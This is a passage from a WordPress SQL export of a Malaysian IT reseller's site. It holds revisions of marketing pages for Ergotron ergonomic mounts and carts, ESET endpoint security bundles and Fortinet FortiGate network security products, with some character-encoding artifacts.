id=\"dnn_ctr2112_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2112\" data-cb-id=\"2112\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<div class=\"row info-strip mgnbtm15\">\r\n<div class=\"item col-md-4 mgnbtm0-xs\">\r\n<div class=\"text-center mgnbtm10 mgntop10\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2018-12-15 20:25:37','2018-12-15 12:25:37','',1483,'https://bintara.com.my/blog/2018/12/15/1483-revision-v1/',0,'revision','',0),(2217,1,'2018-12-15 20:25:56','2018-12-15 12:25:56','<h2 class=\"h4\"><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n\r\n<h3 class=\"text-center mgnbtm2\">Why Choose Ergotron?</h3>\r\n<ol>\r\n 	<li><strong>Ergonomics</strong><img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-ergonomics.png\" /></li>\r\n</ol>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n\r\n2. <strong>Environment</strong><img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-environment.png\" />\r\n\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n\r\n3. <strong>Research</strong>Â  Â  Â <img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-research2.png\" />\r\n\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n\r\n4. <strong>Quality Tested</strong>Â Â <img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-quality.png\" />\r\n\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n\r\n5. <strong>Patents</strong>Â  Â  Â  Â <img src=\"https://www.ergotron.com/portals/0/images/icons/icon-cf.png\" />\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2294\">\r\n<div class=\"container-top-margin\">\r\n<div id=\"dnn_ctr2294_ContentPane\">\r\n<div id=\"dnn_ctr2294_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2294\" data-cb-id=\"2294\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<p class=\"intro\">Ergotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.</p>\r\n\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n<p class=\"h3 ng-binding ng-scope\">1. WorkFit-Z MiniÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/33-458-917-a-560x500.jpg\" width=\"279\" height=\"279\" /></p>\r\n\r\n<div class=\"main\">\r\n<div class=\"ng-binding\">\r\n\r\nMake your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n\r\n2.Â WorkFit-TL, Standing Desk WorkstationÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/33-406-085-wftl-lxarm-single-greyscrn-560x500.jpg\" width=\"277\" height=\"277\" />\r\n\r\nPresenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n\r\n3.Â WorkFit-S,Â Dual Workstation with WorksurfaceÂ Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/33-349-200-wfs-dualworksurface_greyscrn-560x500.jpg\" width=\"277\" height=\"277\" />\r\n\r\nThis easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">LX Desk Monitor ArmÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/45-241-026_a-560x500.jpg\" width=\"183\" height=\"183\" /></li>\r\n</ol>\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n\r\n2.Â LX Dual Stacking ArmÂ  Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/45-248-026%20lx%20dual%20stacking%20front%20trans%20web-hr-560x500.jpg\" width=\"194\" height=\"194\" />\r\n\r\nCreate a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n\r\n3.Â LX Wall Monitor ArmÂ  Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/45-243-026_3-560x500.jpg\" width=\"208\" height=\"208\" />\r\n\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n<h3 class=\"tab accordian ng-binding active\" style=\"text-align: left;\" tabindex=\"0\" role=\"tab\" aria-controls=\"panel1\">Product Benefits</h3>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n<h1>Mobile Carts</h1>\r\nPersonalize an AV, computer or laptop cart to suit your workflow requirements.\r\n<h4>Mobile Workstations</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">WorkFit-C, Single LD Sit-Stand WorkstationÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/24-198-055_av2-560x500.jpg\" width=\"185\" height=\"185\" /></li>\r\n</ol>\r\nThis computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n\r\n2.Â WorkFit-C, Dual Sit-Stand WorkstationÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/24-214-085_c-560x500.jpg\" width=\"174\" height=\"174\" />\r\n\r\nThis innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n\r\n3.Â Neo-FlexÂ® Laptop CartÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/24-205-214_b-560x500.jpg\" width=\"187\" height=\"187\" />\r\n\r\nThis secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n<h4>Medical Carts</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">StyleViewÂ® Laptop Cart, SV40Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/sv40-6100_b1-560x500.jpg\" width=\"205\" height=\"205\" /></li>\r\n</ol>\r\nIncredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n\r\n2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, PoweredÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Products/sv44-53t1_a1-560x500.jpg\" width=\"200\" height=\"200\" />\r\n\r\nExpand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n\r\n3.Â StyleViewÂ® Telemedicine Cart, PoweredÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/sv44-dual-telemed-b-560x500.jpg\" width=\"203\" height=\"203\" />\r\n\r\nThe modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n\r\n4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Products/c50-2510-a1_update-560x500.jpg\" width=\"189\" height=\"189\" />\r\n\r\nThe ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2112\">\r\n<div id=\"dnn_ctr2112_ContentPane\">\r\n<div id=\"dnn_ctr2112_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2112\" data-cb-id=\"2112\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<div class=\"row info-strip mgnbtm15\">\r\n<div class=\"item col-md-4 mgnbtm0-xs\">\r\n<div class=\"text-center mgnbtm10 mgntop10\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2018-12-15 20:25:56','2018-12-15 12:25:56','',1483,'https://bintara.com.my/blog/2018/12/15/1483-revision-v1/',0,'revision','',0),(2763,1,'2018-12-24 14:40:29','2018-12-24 06:40:29','<h3><strong>Protecting you worldwide</strong></h3>\r\nESET is here to secure your computers and devices, protect your precious family pictures and data, or keep your company know-how safe. We protect users just like you across 200 countries and territories worldwide, helping them to use and explore all the great opportunities of the Internet. We are proud that so many individuals and companies trust us to secure their digital lives.\r\n<h3><strong>Efficient endpoint security for small businesses</strong></h3>\r\n<h4><strong>Manage network security via the cloud. NoÂ need for extra hardware</strong></h4>\r\nManage IT security conveniently using ESET Cloud Administrator.Â Benefit from a single-point overview of your network security. Receive notifications as incidents occur. React immediately from wherever you are.\r\n\r\n<img class=\"alignnone wp-image-2446\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/eset.png\" alt=\"\" width=\"291\" height=\"203\" />\r\n<ul>\r\n 	<li>All your network security management in one place</li>\r\n 	<li>Secure access via web browser</li>\r\n 	<li>Always the latest version â€“ updates automatically</li>\r\n 	<li>No need for extra hardware</li>\r\n</ul>\r\n<h3><strong>Bundled solutions for small size business</strong></h3>\r\n<ol>\r\n 	<li><strong>ESET Secure Business Cloud</strong></li>\r\n</ol>\r\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Protection of email gateway</li>\r\n 	<li>Cloud-based remote management</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li><strong>ESET Endpoint Protection Advanced Cloud</strong></li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Cloud-based remote management</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li><strong>ESET Endpoint Protection Advanced</strong></li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<h3><strong>Dynamic endpoint security for mid-size businesses</strong></h3>\r\n<h4><strong>Easy to use, single interface management of your endpoint security</strong></h4>\r\nESET Security Management Center provides a real-time overview of all your on-premise and off premise endpoints via an enterprise-grade console. Benefit from full reporting and security management for all operating systems.\r\n\r\n<img class=\"alignnone wp-image-2447\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/mid-size.png\" alt=\"\" width=\"269\" height=\"177\" />\r\n<ul>\r\n 	<li>Complete network visibility</li>\r\n 	<li>Full security management</li>\r\n 	<li>Flexible reporting</li>\r\n 	<li>Automated security management</li>\r\n</ul>\r\n<h3><strong>Bundled solutions for mid size business</strong></h3>\r\n<ol>\r\n 	<li><strong>ESET Secure Business</strong></li>\r\n</ol>\r\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Protection of email gateway</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li><strong>ESET Dynamic Endpoint Protection</strong></li>\r\n</ol>\r\nEnterprise-grade award-winning ESET endpoint protection with cloud-based sandboxing technology. Incorporates behavior-based detection easily managed via a single online console. Provides:\r\n<ul>\r\n 	<li>Targeted attacks protection</li>\r\n 	<li>Advanced persistent threats detection</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Zero-day threats detection</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li><strong>ESET Endpoint Protection Advanced</strong></li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<h3><strong>Future ready cybersecurity for enterprise</strong></h3>\r\n<h4><strong>Bundled solutions for enterprise</strong></h4>\r\nFits all security requirements. Flexible and scalable to any IT environment.\r\n<ol>\r\n 	<li><strong>ESET Elite Targeted Attack Protection</strong></li>\r\n</ol>\r\nFull-scale protection encompassing all ESETâ€™s latest technologies and services for eliminating all known and unknown threats. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Endpoint Detection &amp; Response</li>\r\n 	<li>Manual Malware Analysis</li>\r\n 	<li>Forensic Analysis &amp; Consulting</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li><strong>ESET Targeted Attack Protection</strong></li>\r\n</ol>\r\nComplete, seamless prevention, detection and response solution, incorporating total visibility, for remediation of any security issue in the network. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Endpoint Detection &amp; Response</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li><strong>ESET Dynamic Endpoint Protection</strong></li>\r\n</ol>\r\nComprehensive, easily managed protection, incorporating off-premise cloud sandboxing leveraging machine learning and behavior-based detection. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n</ul>\r\n<ol start=\"4\">\r\n 	<li><strong>ESET Endpoint Protection Advanced</strong></li>\r\n</ol>\r\nMultilayered protection utilizing multiple technologies and incorporating visibility management and reporting across all operating systems. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n</ul>\r\n<ol start=\"5\">\r\n 	<li><strong>ESET Dynamic Mail Protection</strong></li>\r\n</ol>\r\nBusiness solution incorporating antispam, anti-phishing and Cloud Sandbox Analysis for the complete protection of mailboxes and mail servers. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Mail Security</li>\r\n</ul>\r\n<ol start=\"6\">\r\n 	<li><strong>ESET Identity &amp; Data Protection</strong></li>\r\n</ol>\r\nBusiness solution for superior and enhanced protection of an organizationâ€™s data and intellectual property. Includes:\r\n<ul>\r\n 	<li>Two-factor Authentication</li>\r\n 	<li>Endpoint Encryption</li>\r\n</ul>\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;','ESET','','inherit','closed','closed','','1477-revision-v1','','','2018-12-24 14:40:29','2018-12-24 06:40:29','',1477,'https://bintara.com.my/blog/2018/12/24/1477-revision-v1/',0,'revision','',0),(2447,1,'2018-12-18 21:00:16','2018-12-18 13:00:16','','mid-size','','inherit','closed','closed','','mid-size','','','2018-12-18 21:00:16','2018-12-18 13:00:16','',1477,'https://bintara.com.my/wp-content/uploads/2018/12/mid-size.png',0,'attachment','image/png',0),(2219,1,'2018-12-15 22:36:20','2018-12-15 14:36:20','<h1><strong>Protecting you worldwide</strong></h1>\r\nESET is here to secure your computers and devices, protect your precious family pictures and data, or keep your company know-how safe. We protect users just like you across 200 countries and territories worldwide, helping them to use and explore all the great opportunities of the Internet. We are proud that so many individuals and companies trust us to secure their digital lives.\r\n<h2><strong>Efficient endpoint security for small businesses</strong></h2>\r\n<h3><strong>Manage network security via the cloud. NoÂ need for extra hardware</strong></h3>\r\nManage IT security conveniently using ESET Cloud Administrator.Â Benefit from a single-point overview of your network security. Receive notifications as incidents occur. React immediately from wherever you are.\r\n\r\n<img class=\"\" src=\"https://cdn1.esetstatic.com/_processed_/e/f/csm_ECA-monitorA_48b22c1dab.png\" alt=\"ESET Cloud Administrator image\" width=\"290\" height=\"202\" />\r\n<ul>\r\n 	<li>All your network security management in one place</li>\r\n 	<li>Secure access via web browser</li>\r\n 	<li>Always the latest version â€“ updates automatically</li>\r\n 	<li>No need for extra hardware</li>\r\n</ul>\r\n<h3><strong>Bundled solutions for small size business</strong></h3>\r\n<ol>\r\n 	<li><strong>ESET Secure Business Cloud</strong></li>\r\n</ol>\r\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Protection of email gateway</li>\r\n 	<li>Cloud-based remote management</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li><strong>ESET Endpoint Protection Advanced Cloud</strong></li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Cloud-based remote management</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li><strong>ESET Endpoint Protection Advanced</strong></li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<h2><strong>Dynamic endpoint security for mid-size businesses</strong></h2>\r\n<h3><strong>Easy to use, single interface management of your endpoint security</strong></h3>\r\nESET Security Management Center provides a real-time overview of all your on-premise and off premise endpoints via an enterprise-grade console. Benefit from full reporting and security management for all operating systems.\r\n\r\n<img class=\"\" src=\"https://cdn1.esetstatic.com/_processed_/b/7/csm_ESMC-Monitor-B_73e9e1267a.png\" width=\"280\" height=\"185\" />\r\n<ul>\r\n 	<li>Complete network visibility</li>\r\n 	<li>Full security management</li>\r\n 	<li>Flexible reporting</li>\r\n 	<li>Automated security management</li>\r\n</ul>\r\n<h3><strong>Bundled solutions for mid size business</strong></h3>\r\n<ol>\r\n 	<li><strong>ESET Secure Business</strong></li>\r\n</ol>\r\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Protection of email gateway</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li><strong>ESET Dynamic Endpoint Protection</strong></li>\r\n</ol>\r\nEnterprise-grade award-winning ESET endpoint protection with cloud-based sandboxing technology. Incorporates behavior-based detection easily managed via a single online console. Provides:\r\n<ul>\r\n 	<li>Targeted attacks protection</li>\r\n 	<li>Advanced persistent threats detection</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Zero-day threats detection</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li><strong>ESET Endpoint Protection Advanced</strong></li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<h2><strong>Future ready cybersecurity for enterprise</strong></h2>\r\n<h3><strong>Bundled solutions for enterprise</strong></h3>\r\nFits all security requirements. Flexible and scalable to any IT environment.\r\n<ol>\r\n 	<li><strong>ESET Elite Targeted Attack Protection</strong></li>\r\n</ol>\r\nFull-scale protection encompassing all ESETâ€™s latest technologies and services for eliminating all known and unknown threats. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Endpoint Detection &amp; Response</li>\r\n 	<li>Manual Malware Analysis</li>\r\n 	<li>Forensic Analysis &amp; Consulting</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li><strong>ESET Targeted Attack Protection</strong></li>\r\n</ol>\r\nComplete, seamless prevention, detection and response solution, incorporating total visibility, for remediation of any security issue in the network. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Endpoint Detection &amp; Response</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li><strong>ESET Dynamic Endpoint Protection</strong></li>\r\n</ol>\r\nComprehensive, easily managed protection, incorporating off-premise cloud sandboxing leveraging machine learning and behavior-based detection. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n</ul>\r\n<ol start=\"4\">\r\n 	<li><strong>ESET Endpoint Protection Advanced</strong></li>\r\n</ol>\r\nMultilayered protection utilizing multiple technologies and incorporating visibility management and reporting across all operating systems. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n</ul>\r\n<ol start=\"5\">\r\n 	<li><strong>ESET Dynamic Mail Protection</strong></li>\r\n</ol>\r\nBusiness solution incorporating antispam, anti-phishing and Cloud Sandbox Analysis for the complete protection of mailboxes and mail servers. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Mail Security</li>\r\n</ul>\r\n<ol start=\"6\">\r\n 	<li><strong>ESET Identity &amp; Data Protection</strong></li>\r\n</ol>\r\nBusiness solution for superior and enhanced protection of an organizationâ€™s data and intellectual property. Includes:\r\n<ul>\r\n 	<li>Two-factor Authentication</li>\r\n 	<li>Endpoint Encryption</li>\r\n</ul>\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;','ESET','','inherit','closed','closed','','1477-revision-v1','','','2018-12-15 22:36:20','2018-12-15 14:36:20','',1477,'https://bintara.com.my/blog/2018/12/15/1477-revision-v1/',0,'revision','',0),(2258,1,'2019-09-30 14:25:39','2019-09-30 06:25:39','<strong style=\"font-size: 2em; color: #000;\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">ï»¿</span>Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\n\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\n<ul>\n 	<li>Network security</li>\n 	<li>Multi-Cloud security</li>\n 	<li>Web Application Security</li>\n 	<li>Email security</li>\n 	<li>Advanced Threat Protection</li>\n 	<li>Secure Unified Access</li>\n 	<li>Endpoint security</li>\n 	<li>Management and Analytics</li>\n</ul>\n&nbsp;\n<h2><strong>NETWORK SECURITY</strong></h2>\n<h4>1. Next Generation Firewall (NGFW)</h4>\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\n<h5></h5>\n<h3><strong>Features and Benefits</strong></h3>\n<ul>\n 	<li>\n<h5><strong>High-performance threat protection</strong></h5>\n</li>\n</ul>\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\n<ul>\n 	<li>\n<h5><strong>Validated security effectiveness</strong></h5>\n</li>\n</ul>\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\n<ul>\n 	<li>\n<h5><strong>Protect mission critical applications</strong></h5>\n</li>\n</ul>\nHighly scalable segmentation and ultra-low latency to protect network segments.\n<ul>\n 	<li>\n<h5><strong>Continuous risk assessment via automation</strong></h5>\n</li>\n</ul>\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\n<ul>\n 	<li>\n<h5><strong>Security Fabric integration</strong></h5>\n</li>\n</ul>\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\n<ul>\n 	<li>\n<h5><strong>Enterprise class security management</strong></h5>\n</li>\n</ul>\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\n\n&nbsp;\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\n<h3><strong>Features and Benefits</strong></h3>\n<ul>\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\n</ul>\n&nbsp;\n<h4>3.Â <strong>IPS</strong></h4>\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\n<h3><strong>Features and Benefits</strong></h3>\n<ul>\n 	<li>\n<h5><strong>World-class Protection</strong></h5>\n</li>\n</ul>\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\n<ul>\n 	